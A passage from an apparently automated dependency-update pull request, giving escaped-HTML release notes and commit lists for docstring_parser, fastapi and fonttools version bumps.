href=\"https://github.com/LecrisUT\"\u003e\u003ccode\u003e@​LecrisUT\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Officially support Python 3.13 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Publish packages to PyPI with digital attestations (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGoogle: Fix multi-line parameter definitions (thanks to \u003ca href=\"https://github.com/coolbeevip\"\u003e\u003ccode\u003e@​coolbeevip\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAttrdoc: Remove use of deprecated ast classes (thanks to \u003ca href=\"https://github.com/fedepell\"\u003e\u003ccode\u003e@​fedepell\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.16 (2024-03-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: add a new property, \u003ccode\u003edescription\u003c/code\u003e, that combines short and long\ndescriptions into a single string (thanks to \u003ca href=\"https://github.com/pR0Ps\"\u003e\u003ccode\u003e@​pR0Ps\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: support Python 3.12 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.15 (2022-09-05)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: add a new function, \u003ccode\u003eparse_from_object\u003c/code\u003e, that supports scattered\ndocstrings (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.14.1 (2022-04-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eParser: fix autodetection (regression from 0.14)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.14 (2022-04-25)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumpydoc: Improved support for Example / Examples section\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.13 (2021-11-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGoogle: Added support for Example / Examples section\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.12 (2021-10-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Added support for lone \u003ccode\u003e:rtype:\u003c/code\u003e meta information (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.11 (2021-09-30)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Started tracking changes\u003c/li\u003e\n\u003cli\u003eGeneral: Added ability to combine function docstrings (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReST: Added support for \u003ccode\u003e:type:\u003c/code\u003e and \u003ccode\u003e:rtype:\u003c/code\u003e (thanks to \u003ca href=\"https://github.com/abergou\"\u003e\u003ccode\u003e@​abergou\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/87dca55a7b5bdc854ad1d190f1c461015ba5f008\"\u003e\u003ccode\u003e87dca55\u003c/code\u003e\u003c/a\u003e Bump version: 0.17.0 → 0.18.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/059d189eef68dccd226531a8536652c04e467744\"\u003e\u003ccode\u003e059d189\u003c/code\u003e\u003c/a\u003e Support Python 3.14 (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/9f8501fd9cfc68794b33be79acc03a303c8bb527\"\u003e\u003ccode\u003e9f8501f\u003c/code\u003e\u003c/a\u003e Remove docstring_parser.tests from bdist (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/107\"\u003e#107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/352ac5acfa7e8b91319dd26687996f856c282a97\"\u003e\u003ccode\u003e352ac5a\u003c/code\u003e\u003c/a\u003e Add support for setting default value in type declaration for numpydoc, vario...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/434078c85ef98e1bd38de0bff377e081073227da\"\u003e\u003ccode\u003e434078c\u003c/code\u003e\u003c/a\u003e build: fix builds\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/fd6fe7b35363c1744a732381596d50eda161f9e2\"\u003e\u003ccode\u003efd6fe7b\u003c/code\u003e\u003c/a\u003e epydoc: add missing attribute parsing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/37fac3d32ebd73e16c468aefd54022c6a6d8d563\"\u003e\u003ccode\u003e37fac3d\u003c/code\u003e\u003c/a\u003e docs: fix missing changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rr-/docstring_parser/commit/b4a3c48883f6dd3d69c1dc57545f1b72238c6c2a\"\u003e\u003ccode\u003eb4a3c48\u003c/code\u003e\u003c/a\u003e Allowing \u003ccode\u003eparse\u003c/code\u003e to work with missing \u003ccode\u003e__doc__\u003c/code\u003e (\u003ca href=\"https://github.com/rr-/docstring_parser/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/rr-/docstring_parser/compare/0.17.0...0.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.135.3 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.3...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fonttools` from 4.62.1 to 4.63.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fonttools/fonttools/releases\"\u003efonttools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.63.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[ttLib] Add support for Apple Color Emoji \u003ccode\u003ebgcl\u003c/code\u003e table (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4065\"\u003e#4065\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[ttLib] Add support for \u003ccode\u003eIFT\u003c/code\u003e and \u003ccode\u003eIFTX\u003c/code\u003e tables (Incremental Font Transfer, PatchMapFormat2) (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4070\"\u003e#4070\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4072\"\u003e#4072\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[otData] Introduce \u003ccode\u003eFieldSpec\u003c/code\u003e dataclass for OpenType table schema definitions, replacing raw tuples in \u003ccode\u003eotData.py\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4076\"\u003e#4076\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[Feat] Show \u003ccode\u003ename\u003c/code\u003e table strings as comments next to label IDs in TTX output, matching the convention used by \u003ccode\u003efvar\u003c/code\u003e, \u003ccode\u003eSTAT\u003c/code\u003e, \u003ccode\u003etrak\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cu2qu] Fix Cython complex-division rounding difference in \u003ccode\u003esplit_cubic_into_three\u003c/code\u003e that could cause ±1 off-curve coordinate shifts (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/3928\"\u003e#3928\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4083\"\u003e#4083\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[designspaceLib] Fix \u003ccode\u003emap_backward\u003c/code\u003e\u003ccode\u003egooglefonts/ufo2ft#978\u003c/code\u003e\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[OS/2] Fix \u003ccode\u003esetUnicodeRanges\u003c/code\u003e to accept reserved bits 123-127, restoring round-trip with \u003ccode\u003egetUnicodeRanges\u003c/code\u003e and fixing \u003ccode\u003erecalcUnicodeRanges\u003c/code\u003e crash in the subsetter (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4087\"\u003e#4087\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cython] Declare Cython extensions as free-threading compatible on Python 3.13+, so that importing them on free-threaded Python no longer re-enables the GIL (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4073\"\u003e#4073\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fonttools/fonttools/blob/main/NEWS.rst\"\u003efonttools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.63.0 (released 2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[ttLib] Add support for Apple Color Emoji \u003ccode\u003ebgcl\u003c/code\u003e table (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4065\"\u003e#4065\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[ttLib] Add support for \u003ccode\u003eIFT\u003c/code\u003e and \u003ccode\u003eIFTX\u003c/code\u003e tables (Incremental Font Transfer,\nPatchMapFormat2) (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4070\"\u003e#4070\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4072\"\u003e#4072\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[otData] Introduce \u003ccode\u003eFieldSpec\u003c/code\u003e dataclass for OpenType table schema definitions,\nreplacing raw tuples in \u003ccode\u003eotData.py\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4076\"\u003e#4076\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[Feat] Show \u003ccode\u003ename\u003c/code\u003e table strings as comments next to label IDs in TTX output,\nmatching the convention used by \u003ccode\u003efvar\u003c/code\u003e, \u003ccode\u003eSTAT\u003c/code\u003e, \u003ccode\u003etrak\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cu2qu] Fix Cython complex-division rounding difference in\n\u003ccode\u003esplit_cubic_into_three\u003c/code\u003e that could cause ±1 off-curve coordinate shifts\n(\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/3928\"\u003e#3928\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4083\"\u003e#4083\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[designspaceLib] Fix \u003ccode\u003emap_backward\u003c/code\u003e for many-to-one (flat-segment) axis maps\nthat silently dropped entries via dict comprehension\n\u003ccode\u003egooglefonts/ufo2ft#978\u003c/code\u003e\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[OS/2] Fix \u003ccode\u003esetUnicodeRanges\u003c/code\u003e to accept reserved bits 123-127, restoring\nround-trip with \u003ccode\u003egetUnicodeRanges\u003c/code\u003e and fixing \u003ccode\u003erecalcUnicodeRanges\u003c/code\u003e crash\nin the subsetter (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4087\"\u003e#4087\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cython] Declare Cython extensions as free-threading compatible on Python 3.13+,\nso that importing them on free-threaded Python no longer re-enables the GIL\n(\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4073\"\u003e#4073\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/978d9edccb60ea0e5fbad7015cb11817c3532328\"\u003e\u003ccode\u003e978d9ed\u003c/code\u003e\u003c/a\u003e Release 4.63.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/6b40ecb6f13e076916044ecd8f0fc13ab5f957f6\"\u003e\u003ccode\u003e6b40ecb\u003c/code\u003e\u003c/a\u003e Add changelog entries for 4.63.0\u003c/li\u003e\n\u003cli\u003e\u003ca 